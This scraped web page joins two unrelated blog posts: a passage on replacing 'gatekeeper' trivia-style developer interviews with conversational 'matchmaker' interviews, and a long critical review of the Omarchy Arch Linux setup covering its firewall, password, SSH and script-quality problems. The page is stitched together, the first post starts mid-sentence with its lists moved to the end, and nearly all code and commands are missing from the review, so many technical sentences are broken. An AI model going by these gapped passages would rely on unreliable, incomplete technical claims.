Gatekeepers design your interview process, you’ll often get something that I refer to as “programmer Jeopardy! .” The candidate is peppered with what amount to trivia questions: …and so on. For most jobs where you’re building commercial software by gluing frameworks and APIs together, having vague (or even no) knowledge of those concepts is going to be plenty. Most devs can go a long time using Java or C# before getting into some sort of jam where learning intimate details of the garbage collector’s operation gets them out of it. (This wasn’t always true, but things have improved.) Of course, if the job you’re hiring for is some sort of specialist role around your databases, queuing systems, or infrastructure in general, you absolutely should probe for specialist knowledge of those things. But if the job is “full stack web developer,” where they’re mostly going to be writing business logic and user interface code, they may have plenty of experience and be very good at those things without ever having needed to learn about consensus algorithms and the like. Then, of course, there’s the much-discussed “coding challenge,” the worst versions of which involve springing a problem on someone, giving them a generous four or five minutes to read it, then expecting them to code a solution with a countdown timer running and multiple people watching them. Not everyone can put their best foot forward in those conditions, and after you’ve run the same exercise more than a few times with candidates, it’s easy to forget what the “first-look” experience is like for candidates. Maybe I’ll write a full post about it someday, but it’s my firm conviction that these types of tests have a false-negative rate so high that they’re counterproductive. Gatekeeper types often over-rotate on the fear of “fake” programmers getting hired and use these trivia-type questions and high-pressure exercises to disqualify people who would be perfectly capable of doing the job you need them to do and perfectly capable of learning any of that other stuff quickly, on an as-needed basis. If your interview process feels a bit like an elimination game show, you can probably do better. You, as a manager, are judged both on the quality of your hires and your ability to fill open roles. When the business budgets for a role to be filled, they do so because they expect a business outcome from hiring that person. Individual contributors are not generally rewarded or punished for hiring decisions, so their incentive is to avoid bringing in people who make extra work for them. Hiring an underskilled person onto the team is a good way to drag down productivity rather than improve it, as everyone has to spend some of their time carrying that person. Additionally, the absence of any kind of licensing or credentialing structure✳️ in programming creates a vacuum that the elimination game show tries to fill. In medicine, law, aviation, or the trades, there’s an external gatekeeper that ensures a baseline level of competence before anyone can even apply for a job. In software, there’s no equivalent, so it makes sense that some interviewers take a “prove to me you can do this job” approach out of the gate. But there’s a better way. “Matchmaking” in the romantic sense tries to pair up people with mutual compatibilities in the hopes that their relationship will also be mutually beneficial to both parties—a real “whole is greater than the sum of its parts” scenario. This should also be true of hiring. You have a need for some skills that will elevate and augment your team; candidates have a desire to do work that means something to them with people they like being around (and yes, money to pay the bills, of course). When people date each other, they’re usually not looking to reject someone based on a box-checking exercise. Obviously, some don’t make it past the initial screen for various reasons, but if you’re going on a second date and looking for love, you’re probably doing it because you want it to work out. Same goes for hiring. If you take the optimistic route, you can let go of some of the pass/fail and one-size-fits-all approaches to candidate evaluation and spend more time trying to find a love match. For all but the most junior roles, I’m confident you can get a strong handle on a candidate’s technical skills by exploring their work history in depth. I’m a big fan of “behavioural” interviewing, where you ask about specific things the candidate has done. I start with a broad opening question and then use ad hoc follow-ups in as conversational a manner as I can muster. I want to have a discussion, not an interrogation. Start with questions like: If you practice, or watch someone who is good at this type of interview, you can easily fill a 45–60 minute interview slot with a couple of those top-level questions and some ad hoc follow-ups based on their answers. Of the three examples I gave, two are a good starting place for assessing technical skills. Most developers will give you a software project as the work they’re the most proud of (if they say “I raised hamsters as a kid,” feel free to ask them to limit it to the realm of software development and try again). This is your opportunity to dig in on the technical details: Questions like that will give you a much stronger signal on their technical skills and, importantly, experience. You should be able to easily tell how much the candidate was a driver vs. a passenger on the project, whether or not they thought about the bigger picture, and how deep or shallow their knowledge was. And, of course, you can keep asking follow-up questions to the follow-up questions until you’ve got a good sense. Interviewing and taking a job does have a lot of parallels to dating and getting married. There are emotional and financial implications for both parties if it doesn’t work out, there’s always a degree of risk involved, and there’s sometimes a degree of asymmetry between the parties. In the job market, the asymmetry is nearly always in favour of the employer. They hold most of the cards and can dictate the terms of the process completely. You have a choice as a leader how much you want to wield that power. My advice is to wield it sparingly—try to give candidates the kind of experience where even if you don’t hire them, they had a good enough time in the process that they’d still recommend you to a friend. Taking an interest in their experience, understanding what motivates them, and fitting candidates to the role that maximizes their existing skills, challenges them in the right ways, and takes maximum advantage of their intrinsic motivations will produce much better results than making them run through the gauntlet like a contestant on Survivor . " Old Royal Naval College, Greenwich - King William Court and Queen Mary Court - gate " by ell brown is licensed under CC BY 2.0 . Like this? Please feel free to share it on your favourite social media or link site! Share it with friends! Hit subscribe to get new posts delivered to your inbox automatically. Feedback? Questions? Topic Suggestions? Get in touch ! I don’t want to hire this person unless they prove themselves worthy . It’s my job to keep the bad and fake programmers out. ( Gatekeeper ) I want to hire this person unless they disqualify themselves somehow. It’s my job to find a good match between our needs and the candidate’s skills and interests. ( Matchmaker ) What’s a deadlock? How do you resolve it? Oh, you know Java? Explain how the garbage collector works! What’s the CAP theorem? What’s the work you’ve done that you’re the most proud of?✳️ What’s the hardest technical problem you’ve encountered? What was the resolution? Tell me about your favourite team member to work with. Least favourite? What language or frameworks did they use? Did they choose, or did someone else? How was it deployed? What sort of testing strategy did they use? What databases were involved? How did their stuff fit into the architecture of the broader system?

1 views
マリウス 1 months ago

A Word on Omarchy

Pro tip: If you’ve arrived here via a link aggregator, feel free to skip ahead to the Summary for a conveniently digestible tl;dr that spares you all the tedious details, yet still provides enough ammunition to trash-talk this post in the comments of whatever platform you stumbled upon it. In the recent months, there has been a noticeable shift away from the Windows desktop, as well as from macOS , to Linux, driven by various frustrations, such as the Windows 11 Recall feature. While there have historically been more than enough Linux distributions to choose from, for each skill level and amount of desired pain, a recent Arch -based configuration has seemingly made strides across the Linux landscape: Omarchy . This pre-configured Arch system is the brainchild of David Heinemeier Hansson , a Danish web developer and entrepreneur known as one of the co-founders of 37signals and for developing the Ruby on Rails framework. The name Omarchy appears to be a portmanteau of Arch , the Linux distribution that Hansson ’s configuration is based upon, and お任せ, which translates to omakase and means to leave something up to someone else (任せる, makaseru, to entrust ). When ordering omakase in a restaurant, you’re leaving it up to the chef to serve you whatever they think is best. Oma(kase) + (A)rch + y is supposedly where the name comes from. It’s important to note that, contrary to what Hansson says in the introduction video , Omarchy is not an actual Linux distribution . Instead, it’s an opinionated installation of Arch Linux that aims to make it easy to set up and run an Arch desktop, seemingly with as much TUI-hacker-esque aesthetic as possible. Omarchy comes bundled with Hyprland , a tiling window manager that focuses on customizability and graphic effects, but apparently not as much on code quality and safety . However, the sudden hype around Omarchy , which at this point has attracted attention and seemingly even funding from companies like Framework (Computer Inc.) ( attention ) and Cloudflare ( attention and seemingly funding ), made me want to take a closer look at the supposed cool kid on the block to understand what it was all about. Omarchy is a pre-configured installation of the Arch distribution that comes with a TUI installer on a 6.2GB ISO. It ships with a collection of shell scripts that use existing FOSS software (e.g. walker ) to implement individual features. The project is based on the work that the FOSS community, especially the Arch Linux maintainers, have done over the years, and ties together individual components to offer a supposed ready-to-use desktop experience. Omarchy also adds some links to different websites, disguised as “Apps” , but more on that later. This, however, seems to be enough to spark an avalanche of attention and, more importantly, financial support for the project. Anyway, let’s give Omarchy an actual try, and see what chef Hansson recommended to us. The Omarchy installer is a simple text user interface that tries to replicate what Charm has pioneered with their TUI libraries: A smooth command-line interface that preserves the simplicity of the good old days , yet enhances the experience with playful colors, emojis, and animations for the younger, future generation of users. Unlike mature installers, Omarchy ’s installer script doesn’t allow for much customization, which is probably to be expected with an “Opinionated Arch/Hyprland Setup” . Info: Omarchy uses gum , a Charm tool, under the hood. One of the first things that struck me as unexpected was the fact that I was able to use as my user password, an easy-to-guess word that Omarchy will also use for the drive encryption, without any resistance from the installer. Most modern Linux distributions actively prevent users from setting easily guessable or brute-forceable passwords. Moreover, taking into account that the system relies heavily on sudo (instead of the more modern doas ), and also considering that the default installation configures the maximum number of password retries to 10 (instead of the more cautious limit of three), it raises an important question: Does Omarchy care about security? Let’s take a look at the Omarchy manual to find out: Omarchy takes security extremely seriously. This is meant to be an operating system that you can use to do Real Work in the Real World . Where losing a laptop can’t lead to a security emergency. According to the manual, taking security extremely seriously means enabling full-disk encryption (but without rejecting simple keys), blocking all ports except for 22 (SSH, on a desktop) and 53317 (LocalSend), continuously running (even though staying bleeding-edge has repeatedly proven to be in insufficient security measure in the past) and maintaining a Cloudflare protected package mirror. That’s seemingly all. Hm. Proceeding with the installation, the TUI prompts for an email address, which makes the whole process feel a bit like the Windows setup routine. While one might assume Omarchy is simply trying to accommodate its new user base, the actual reason appears to be much simpler: . If, however, you’d be expecting for Omarchy to set up GPG with proper defaults, configure SSH with equally secure defaults, and perhaps offer an option to create new GPG/SSH keys or import existing ones, in order to enable proper commit and push signing for Git, you will be left disappointed. Unfortunately, none of this is the case. The Git config doesn’t enable commit or push signing, neither the GPG nor the SSH client configurations set secure defaults, and the user isn’t offered a way to import existing keys or create new ones. Given that Hansson himself usually does not sign his commits, it seems that these aspects are not particularly high on the project’s list of priorities. The rest of the installer routine is fairly straightforward and offers little customization, so I won’t bore you with the details, but you can check the screenshots below. After initially downloading the official ISO file, the first boot of the system greets you with a terminal window informing you that it needs to update a few packages . And by “a few” it means another 1.8GB. I’m still not entirely sure why the v3.0.2 ISO is a hefty 6.2GB, or why it requires downloading an additional 1.8GB after installation on a system with internet access. For comparison, the official Arch installer image is just 1.4GB in size . While downloading the updates (which took over an hour for me), and with over 15GB of storage consumed on my hard drive, I set out to experience the full Omarchy goodness! After hovering over a few icons on the Waybar , I discovered the menu button on the very left. It’s not a traditional menu, but rather a shortcut to the aforementioned walker launcher tool, which contains a few submenus: The menu reads: Apps, Learn, Trigger, Style, Setup, Install, Remove, Update, About, System; It feels like a random assortment of categories, settings, package manager subcommands, and actions. From a UX perspective, this main menu doesn’t make much sense to me. But I’m feeling lucky, so let’s just go ahead and type “Browser” ! Hm, nothing. “Firefox” , maybe? Nope. “Chrome” ? Nah. “Chromium” ? No. Unfortunately the search in the menu is not universal and requires you to first click into the Apps category. The Apps category seems to list all available GUI (and some TUI) applications. Let’s take a look at the default apps that Omarchy comes with: The bundled “apps” are: 1Password, Alacritty, Basecamp, Bluetooth, Calculator, ChatGPT, Chromium, Discord, Disk Usage, Docker, Document Viewer, Electron 37, Figma, Files, GitHub, Google Contacts, Google Messages, Google Photos, HEY, Image Viewer, Kdenlive, LibreOffice, LibreOffice Base, LibreOffice Calc, LibreOffice Draw, LibreOffice Impress, LibreOffice Math, LibreOffice Writer, Limine-snapper-restore, LocalSend, Media Player, Neovim, OBS Studio, Obsidian, OpenJDK Java 25 Console, OpenJDK Java 25 Shell, Pinta, Print Settings, Signal, Spotify, Typora, WhatsApp, X, Xournal++, YouTube, Zoom; Aside from the fact that nearly a third of the apps are essentially just browser windows pointing to websites , which leaves me wondering where the 15GB of used storage went, the selection of apps is also… well, let’s call it opinionated , for now at least. Starting with the browser, Omarchy comes with Chromium by default, specifically version 141.0.7390.107 in my case, which, unlike, for example, ungoogled-chromium , has disabled support for manifest v2 and thus doesn’t include extensions like uBlock Origin or any other advanced add-ons. In fact, the browser is completely vanilla, with no decent configuration. The only extension it includes is the copy-url extension, which serves a rather obscure purpose: Providing a non-intuitive way to copy the current page’s URL to your clipboard using an even less intuitive shortcut ( ) while using any of the “Apps” that are essentially just browser windows without browser controls. Other than that, it’s pretty much stock Chromium. It allows all third-party cookies, doesn’t send “Do Not Track” requests, sends browsing data to Google Safe Browsing , but doesn’t enforce HTTPS. It has JavaScript optimization enabled for all websites, which increases the attack surface, and it uses Google as the default search engine. There’s not a single opinionated setting in the configuration of the default browser on Omarchy , let alone in the choice of browser itself. And the fact that the only extension installed and active by default is an obscure workaround for the lack of URL bars in “App” windows doesn’t exactly make this first impression of what is likely one of the most important components for the typical Omarchy user very appealing. Alright, let’s have a look at what is probably the second most important app after the browser for many people in the target audience: Basecamp ! Just kidding. Obviously, it’s the terminal. Omarchy comes with Alacritty by default, which is a bit of an odd choice in 2025, especially for a desktop that seemingly prioritizes form over function, given the ultra-conservative approach the Alacritty developers take toward anything related to form and sometimes even function. I would have rather expected Kitty , WezTerm , or Ghostty . That said, Alacritty works and is fairly configurable. Unfortunately, like the browser and various other tools such as Git, there’s little to no opinionated configuration happening, especially one that would enhance integration with the Omarchy ecosystem. Omarchy seemingly highlights the availability of NeoVim by default, yet doesn’t explicitly configure Alacritty’s vi mode , leaving it at its factory defaults . In fact, aside from the keybinding for full-screen mode, which is a less-than-ideal shortcut for anyone with a keyboard smaller than 100% (unless specifically mapped), the Alacritty config doesn’t define any other shortcuts to integrate the terminal more seamlessly into the supposed opinionated workflow. Not even the desktop’s key-repeat rate is configured to a reasonable value, as it takes about a second for it to kick in. Fun fact: When you leave your computer idling on your desk, the screensaver you’ll encounter isn’t an actual hyprlock that locks your desktop and uses PAM authentication to prevent unauthorized access. Instead, it’s a shell script that launches a full-screen Alacritty window to display a CPU-intensive ASCII animation. While Omarchy does use hyprlock , its timeout is set longer than that of the screensaver. Because you can’t dismiss the screensaver with your mouse (only with your keyboard) it might give inexperienced users a false sense of security. This is yet another example of prioritizing gimmicky animations over actual functionality and, to some degree, security. Like the browser and the terminal emulator, the default shell configuration is a pretty basic B….ash , and useful extensions like Starship are barely configured. For example, I ed into a boilerplate Python project directory, activated its venv , and expected Starship to display some useful information, like the virtual environment name or the Python version. However, none of these details appeared in my prompt. “Surely if I do the same in a Ruby on Rails project, Starship will show me some useful info!” I thought, and ed into a Rails boilerplate project. Nope. In fact… Omarchy doesn’t come with Rails pre-installed. I assume Hansson ’s target audience doesn’t primarily consist of Rails developers, despite the unconditional , but let’s not get ahead of ourselves. It is nevertheless puzzling that Omarchy doesn’t come with at least Ruby pre-installed. I find it a bit odd that the person who literally built the most successful Ruby framework on earth is pre-installing “Apps” like HEY , Spotify , and X , but not his own FOSS creation or even just the Ruby interpreter. If you want Rails , you have to navigate through the menu to “Install” , then “Development” , and finally select "‘Ruby on Rails" to make RoR available on your system. Not just Ruby , though. And even going the extra mile to do so still won’t make Starship display any additional useful info when inside a Rails project folder. PS: The script that installs these development tools bypasses the system’s default package manager and repository, opting instead to use mise to install interpreters and compilers. This is yet another example of security not being taken quite as seriously as it should be. At the very least, the script should inform the user that this is about to happen and offer the option to use the package manager instead, if the distributed version meets the user’s needs. Fun fact: At the time of writing, mise installed Ruby 3.4.7. The latest package available through the package manager is – you guessed it – 3.4.7. As mentioned earlier, Omarchy is built entirely using Bash scripts, and there’s nothing inherently wrong with that. When done correctly and kept at a sane limit, Bash scripts are powerful and relatively easy to maintain. However, the scripts in Omarchy are unfortunately riddled with little oversights that can cause issues. Those scripts are also used in places in which a proper software implementation would have made more sense. Take the theme scripts, for example. If you go ahead and create a new theme under and name it , and then run a couple of times until the tool hits your new theme, you can see one effect of these oversights. Nothing catastrophic happened, except now won’t work anymore. If you’d want to annoy an unsuspecting Omarchy user, you could do this: While this is such a tiny detail to complain about, it is an equally low-hanging fruit to write scripts in a way in which this won’t happen. Apart from the numerous places where globbing and word splitting can occur, there are other instances of code that could have also been written a little bit more elegantly. Take this line , for example: To drop and from the , you don’t have to call and pipe to . Instead, you can simply use Bash’s built-in regex matching to do so: Similarly, in this line there’s no need to test for a successful exit code with a dedicated check, when you can simply make the call from within the condition: And frankly, I have no idea what this line is supposed to be: What are you doing, Hansson? Are you alright? Make no mistake to believe that the remarks made above are the only issues with Hansson ’s scripts in Omarchy . While these specific examples are nitpicks, they paint a picture that is only getting less colorful the more we look into the details. We can continue to gauge the quality of the scripts by looking beyond just syntax. Take, for example, the migration : This script runs five commands in sequence within an condition: first , followed by two invocations, then again, and finally . While this might work as expected “on a sunny day” , the first command could fail for various reasons. If it does, the subsequent commands may encounter issues that the script doesn’t account for, and the outcome of this migration will be differently from what the author anticipated. For experienced users, the impact in such a case may be minimal, but for others, it may present a more significant hurdle. Furthermore, as can be seen in here , the invoking process cannot detect if only one of the five commands failed. As a result, the entire migration might be marked as skipped , despite changes being made to the system. But let’s continue to look into specifically the migrations in just a moment. The real concern here, however, is the widespread absence of exception handling, either through status code checks for previously executed commands or via dependent executions (e.g., ). In most scripts, there is no validation to ensure that actions have the desired effect and the current state actually represents the desired outcome. Almost all sequentially executed commands depend upon one another, yet the author doesn’t make sure that if fails the script won’t just blindly run . Note: Although sets , which would cause a script like the one presented above to fail when the first command fails, the migrations are invoked by sourcing the script. This script, in turn, invokes the script using the helper function . However, this function executes the script in the following way: In this case, the options are not inherited by the actual migration , meaning it won’t stop immediately when an error occurs. This behavior makes sense, as abruptly stopping the installation would leave the system in an undefined state. But even if we ignored that and assumed that migrations would stop when the first command would fail, it still wouldn’t actually handle the exception, but merely stop the following commands from performing actions on an unexpected state. To understand the broader issue and its impact on security, we need to dive deeper into the system’s functioning, and especially into migrations . This helps illustrate how the fragile nature of Omarchy could take a dangerous turn, especially considering the lack of tests, let alone any dedicated testing infrastructure. Let’s start by adding some context and examining how configurations are applied in Omarchy . Inspired by his work as a web developer, Hansson has attempted to bring concepts from his web projects into the scripts that shape his Linux setup. In Omarchy , configuration changes are handled through migration scripts, as we just saw, which are in principle similar to the database migrations you might recall from Rails projects. However, unlike SQL or the Ruby DSL used in Active Record Migrations , these Bash scripts do not merely contain a structured query language; They execute actual system commands during installation. More importantly: They are not idempotent by default! While the idea of migrations isn’t inherently problematic, in this case, it can (and has) introduce(d) issues that go/went unnoticed by the Omarchy maintainers for extended periods, but more on that in a second. The migration files in Omarchy are a collection of ambiguously named scripts, each containing a set of changes to the system. These changes aren’t confined to specific configuration files or components. They can be entirely arbitrary, depending on what the migration is attempting to implement at the time it is written. To modify a configuration file, these migrations typically rely on the command. For instance, the first migration intended to change from to might execute something like . The then following one would have to account for the previous change: . Another common approach involves removing a specific line with and appending the new settings via . However, since multiple migrations are executed sequentially, often touching the same files and running the same commands, determining the final state of a configuration file can become a tedious process. There is no clear indication of which migration modifies which file, nor any specific keywords (e.g., ) to grep for and help identify the relevant migration(s) when searching through the code. Moreover, because migrations rely on fixed paths and vary in their commands, it’s impossible to test them against mock files/folders, to predict their outcome. These scripts can invoke anything from sourcing other scripts to running commands, with no restrictions on what they can or cannot do. There’s no “framework” or API within which these scripts operate. To understand what I mean by that, let’s take a quick look at a fairly widely used pile of scripts that is of similar importance to a system’s functionality: OpenRC . While the init.d scripts in OpenRC are also just that, namely scripts, they follow a relatively well-defined API : Note: I’m not claiming that OpenRC ’s implementation is flawless or the ultimate solution, far from it. However, given the current state of the Omarchy project, it’s fair to say that OpenRC is significantly better within its existing constraints. Omarchy , however, does not use any sort of API for that matter. Instead, scripts can basically do whatever they want, in whichever way they deem adequate. Without such well defined interfaces , it is hard to understand the effects that migrations will have, especially when changes to individual services are split across a number of different migration scripts. Here’s a fun challenge: Try to figure out how your folder looks after installation by only inspecting the migration files. To make matters worse, other scripts (outside the migration folder) may also modify configurations that were previously altered by migrations , at runtime, such as . Note: To the disappointment of every NixOS user, unlike database migrations in Rails , the migrations in Omarchy don’t support rollbacks and, judging by their current structure, are unlikely to do so moving forward. The only chance Omarchy users have in case a migration should ever brick their existing system is to make use of the available snapshots . All of this (the lack of interfaces , the missing exception handling and checks for desired outcomes, the overlapping modification, etc.) creates a chaotic environment that is hard to overview and maintain, which can severely compromise system integrity and, by extension, security. Want an example? On my fresh installation, I wanted to validate the following claim from the manual : Firewall is enabled by default: All incoming traffic by default except for port 22 for ssh and port 53317 for LocalSend. We even lock down Docker access using the ufw-docker setup to prevent that your containers are accidentally exposed to the world. What I discovered upon closer inspection, however, is that Omarchy ’s firewall doesn’t actually run, despite its pre-configured ruleset . Yes, you read that right, everyone installing the v3.0.2 ISO (and presumably earlier versions) of Omarchy is left with a system that doesn’t block any of the ports that individual software might open during runtime. Please bear in mind that apart from the full-disk encryption, the firewall is the only security measure that Omarchy puts in place. And it’s off by default. Only once I manually enabled and started using / , it did activate the rules mentioned in the handbook. As highlighted in the original issue , it appears that, with the chaos that are the migration- , preflight- and first-run- scripts no one ever realized that you need to tell to explicitly enable a service for it to actually run. And because it’s all made up of Bash scripts that can do whatever they want, you cannot easily test these things to notice that the state that was expected for a specific service was not reached. Unlike in Rails , where you can initialize your (test) database and run each migration manually if necessary to make sure that the schema reaches the desired state and that the database is seeded correctly, this agglomeration of Bash scripts is not structured data. Hence, applying the same principle to something as arbitrary as a Bash script is not as easily possible, at least not without clearly defined structures and interfaces . As a user who trusted Omarchy to secure their installation, I would be upset, to say the least. The system failed to keep users safe, and more importantly, nobody noticed for a long time. There was no hotfix ISO issued, nor even a heads-up to existing users alongside the implemented fix ( e.g. ). While mistakes happen, simply brushing them under the rug feels like rather negligent behavior. When looking into the future, the mess that is the Bash scripts certainly won’t decrease in complexity, making me doubt that things like these won’t happen again. Note: The firewall fix was listed in v2.1.1. However, on my installation of v3.0.2 the firewall would still not come up automatically. I double-checked this by running the installation of v3.0.2 twice, and both times the firewall would not autostart after the second reboot. While writing this post, v3.1.0 ( update: v3.1.1 ) was released and I also checked the issue there. v3.1.0 appears to have finally fixed the firewall issue. Having that said, it shows how much of a mess the whole system is, when things that were identified and supposedly fixed multiple versions ago still don’t work in newer releases weeks later. Tl;dr: v3.1.0 appears to be the first release to actually fix the firewall issue, even though it was identified and presumably fixed in v2.1.1, according to the changelog. With the firewall active, it becomes apparent that Omarchy ’s configuration does indeed leave port 22 (SSH) open, even though the SSH daemon is not running by default. While I couldn’t find a clear explanation for why this port is left open on a desktop system without an active SSH server, my assumption is that it’s intended to allow the user to remotely access their workstation should they ever need to. It’s important to note that the file in Omarchy , like many other system files, remains unchanged. Users might reasonably assume that, since Omarchy intentionally leaves the SSH port open, it must have also configured the SSH server with sensible defaults. Unfortunately, this is not the case. In a typical Arch installation, users would eventually come across the “Protection” section on the OpenSSH wiki page, where they would learn about the crucial settings that should be adjusted for security reasons. However, when using a system like Omarchy , which is marketed as an opinionated setup that takes security seriously , users might expect these considerations to be handled for them, making it all the more troubling that no sensible configuration is in place, despite the deliberate decision to leave the SSH port open for future use. Hansson seemingly struggles to get even basics like right. The fact that there’s so little oversight, that users are allowed to set weak password for both, their account and drive encryption, and that the only other security measure put in place, the firewall, simply hasn’t been working, does not speak in favor of Omarchy . Info: is abstraction layer that simplifies managing the powerful / firewall and it stands for “ u ncomplicated f ire w all”. Going into this review I wasn’t expecting a hardened Linux installation with SELinux , intrusion detection mechanisms, and all these things. But Hansson is repeatedly addressing users of Windows and macOS (operating systems with working firewalls and notably more security measures in place) who are frustrated with their OS, as a target audience. At this point, however, Omarchy is a significantly worse option for those users. Not only does Omarchy give a hard pass on Linux Security Modules , linux-hardened , musl , hardened_malloc , or tools like OpenSnitch , and fails to properly address security-related topics like SSH, GPG or maybe even AGE and AGE/Yubikey , but it in fact weakens the system security with changes like the increase of and login password retries and the decrease of faillock timeouts . Omarchy appears to be undoing security measures that were put in place by the software- and by the Arch -developers, while the basis it uses for building the system does not appear to be reliable enough to protect its users from future mishaps. Then there is the big picture of Omarchy that Hansson tries to curate, which is that of a TUI-centered, hacker -esque desktop that promises productivity and so on. He even goes as far as calling it “a pro system” . However, as we clearly see from the implementation, configuration and the project’s approach to security, this is unlike anything you would expect from a pro system . The entire image of a TUI-centered productivity environment is further contradicted in many different places, primarily by the lack of opinions and configuration . If the focus is supposed to be on “pro” usage, and especially the command-line, then… The configuration doesn’t live up to its sales pitch, and there are many aspects that either don’t make sense or aren’t truly opinionated , meaning they’re no different from a standard Arch Linux installation. In fact, I would go as far as to say that Omarchy is barely a ready-to-use system at all out of the box and requires a lot of in-depth configuration of the underlying Arch distribution for it to become actually useful. Let’s look at only a few details. There are some fairly basic things you’ll miss on the “lightweight” 15GB installation of Omarchy : With the attention Omarchy is receiving, particularly from Framework (Computer Inc.) , it is surprising that there is no option to install the system on RAID1 hardware: I would argue that RAID1 is a fairly common use case, especially with Framework (Computer Inc.) 16" laptops, which support a secondary storage device. Considering that Omarchy is positioning itself to compete against e.g. macOS with TimeMachine , yet it does not include an automated off-drive backup solution for user data by default – which by the way is just another notable shortcoming we could discuss – and given that configuring a RAID1 root with encryption is notoriously tedious on Linux, even for advanced users, the absence of this option is especially disappointing for the intended audience. Even moreso when neither the installer nor the post-installation process provides any means to utilize the additional storage device, leaving inexperienced users seemingly stuck with the command. Omarchy does not come with a dedicated swap partition, leaving me even more puzzled about its use of 15GB of disk space. I won’t talk through why having a dedicated swap partition that is ideally encrypted using the same mechanisms already in place is a good idea. This topic has been thoroughly discussed and written about countless times. However, if you, like seemingly the Omarchy author, are unfamiliar with the benefits of having swap on Linux, I highly recommend reading this insightful write-up to get a better understanding. What I will note, however, is that the current configuration does not appear to support hibernation via the command through the use of a dynamic swap file . This leads me to believe that hibernation may not function on Omarchy . Given the ongoing battery drain issues with especially Framework (Computer Inc.) laptops while in suspend mode, it’s clear that hibernation is an essential feature for many Linux laptop users. Additionally, it’s hard to believe that Hansson , a former Apple evangelist , wouldn’t be accustomed to the simple act of closing the lid on his laptop and expecting it to enter a light sleep mode, and eventually transitioning into deep sleep to preserve battery life. If he had ever used Omarchy day-to-day on a laptop in the same way most people use their MacBooks , he would almost certainly have noticed the absence of these features. This further reinforces the impression that Omarchy is a project designed to appear robust at first glance, but reveals a surprisingly hollow foundation upon closer inspection. Let’s keep our focus on laptop use. We’ve seen Hansson showcasing his Framework (Computer Inc.) laptop on camera, so it’s reasonable to assume he’s using Omarchy on a laptop. It’s also safe to say that many users who might genuinely want to try Omarchy will likely do so on a laptop as well. That said, as we’ve established before, closing the laptop lid doesn’t seem to trigger hibernate mode in Omarchy . But if you close the lid and slip the laptop into your backpack, surely it would activate some power-saving measures, right? At the very least, it should blank the screen, switch the CPU governor to powersaving , or perhaps even initiate suspend to RAM ? Well… Of course, I can’t test these scenarios firsthand, as I’m evaluating Omarchy within a securely confined virtual machine, where any unintended consequences are contained. Still, based on the system’s configuration, or more accurately the lack thereof, it seems unlikely that an Omarchy laptop will behave as expected. The system might switch power profiles due to the power-profiles-daemon when not plugged in, yet its functionality is not comparable to a properly configured or similar. It seems improbable that it will enter suspend to RAM or hibernate mode, and it’s doubtful any other power-saving measures (like temporarily halting non-essential background processes) will be employed to conserve battery life. Although the configuration comes with an “app” for mail, namely HEY , that platform does not support standard mail protocols . I don’t think it’s a hot take to say that probably 99% of Omarchy ’s potential users will need to work with an email system that does support IMAP and SMTP, however. Yet, the base system offers zero tools for that. I’m not even asking for anything “fancy” like ; Omarchy unfortunately doesn’t even come with the most basic tools like the command out of the box. Whether you want to send email through your provider, get a simple summary for a scheduled Cron job delivered to your local mailbox, or just debug some mail-related issue, the command is relatively essential, even on a desktop system, but it is nowhere to be found on Omarchy . Speaking of which: Cron jobs? Not a thing on Omarchy . Want to automate backing up some files to remote storage? Get ready to dive into the wonderful world of timers , where you’ll spend hours figuring out where to create the necessary files, what they need to contain, and how to activate them. Omarchy could’ve easily included a Cron daemon or at least for the sake of convenience. But I guess this is a pro system , and if the user needs periodic jobs, they will have to figure out . Omarchy is, after all, -based … … and that’s why it makes perfect sense for it to use rootless Podman containers instead of Docker. That way, users can take advantage of quadlets and all the glorious integration. Unfortunately, Omarchy doesn’t actually use Podman . It uses plain ol’ Docker instead. Like most things in Omarchy , power monitoring and alerting are handled through a script , which is executed every 30 seconds via a timer. That’s your crash course on timers right there, Omarchy users! This script queries and then uses to parse the battery percentage and state. It’s almost comical how hacky the implementation is. Given that the system is already using UPower , which transmits power data via D-Bus , there’s a much cleaner and more efficient way to handle things. You could simply use a piece of software that connects to D-Bus to continuously monitor the power info UPower sends. Since it’s already dealing with D-Bus , it can also send a desktop notification directly to whatever notification service you’re using (like in Omarchy ’s case). No need for , , or a periodic Bash script triggered by a timer. “But where could I possibly find such a piece of software?” , you might ask. Worry not, Hr. Hansson , I have just the thing you need ! That said, I can understand that you, Hr. Hansson , might be somewhat reluctant to place your trust in software created by someone who is actively delving into the intricacies of your project, rather than merely offering a superficial YouTube interview to casually navigate the Hyprland UI for half an hour. Of course, Hr. Hansson , you could have always taken the initiative to develop a more robust solution yourself, in a proper, lower-level language, and neatly integrated it into your Omarchy repository. But we will explore why this likely hasn’t been a priority for you, Hr. Hansson , in just a moment. While the author’s previous attempt for a developer setup still came with Zellij , this time his opinions seemingly changed and Omarchy doesn’t include Zellij , or Tmux or even screen anymore. And nope, picocom isn’t there either, so good luck reading that Arduino output from . That moment, when you realize that you’ve spent hours figuring out timers , only to find out that you can’t actually back up those files to a remote storage because there’s no , let alone or . At least there is the command. :-) Unfortunately not, but Omarchy comes with and by default. I could go on and on, and scavenge through the rest of the unconfigured system and the scripts, like for example the one, where Omarchy once again seems to prefer -ing random scripts from the internet (or anyone man-in-the-middle -ing it) rather than using the system package manager to install Tailscale . But, for the sake of both your sanity and mine, I’ll stop here. As we’ve seen, Omarchy is more unconfigured than it is opinionated . Can you simply install all the missing bits and piece and configure them yourself? Sure! But then what is the point of this supposed “perfect developer setup” or “pro system” to begin with? In terms of the “opinionated” buzzword, most actual opinions I’ve come across so far are mainly about colors, themes, and security measures. I won’t dare to judge the former two, but as for the latter, well, unfortunately they’re the wrong opinions . In terms of implementation: Omarchy is just scripts, scripts, and more scripts, with no proper structure or (CI) tests. BTW: A quick shout out to your favorite tech influencer , who probably has at least one video reviewing the Omarchy project without mentioning anything along these lines. It is unfortunate that these influential people barely scratch the surface on a topic like this, and it is even more saddening that recording a 30 minute video of someone clicking around on a UI seemingly counts as a legitimate “review” these days. The primary focus for many of these people is seemingly on pumping out content and generating hype for views and attention rather than providing a thoughtful, thorough analysis. ( Alright, we’re almost there. Stick with me, we’re in the home stretch. ) The Omarchy manual : The ultimate repository of Omarchy wisdom, all packed into 33 pages, clocking in at little over 10,000 words. For context, this post on Omarchy alone is almost 10,000 words long. As is the case with the rest of the system, the documentation also adheres to Hansson ’s form over function approach. I’ve mentioned this before, but it bears repeating: Omarchy doesn’t offer any built-in for its scripts, let alone auto-completion, nor does it come with traditional pages. The documentation is tucked away in yet another SaaS product from Hansson ’s company ( Writebook ) and its focus is predominantly on themes, more themes, creating your own themes, and of course, the ever-evolving hotkeys. Beyond that, the manual mostly covers how to locate configuration files for individual UI components and offers guidance on how to configure Hyprland 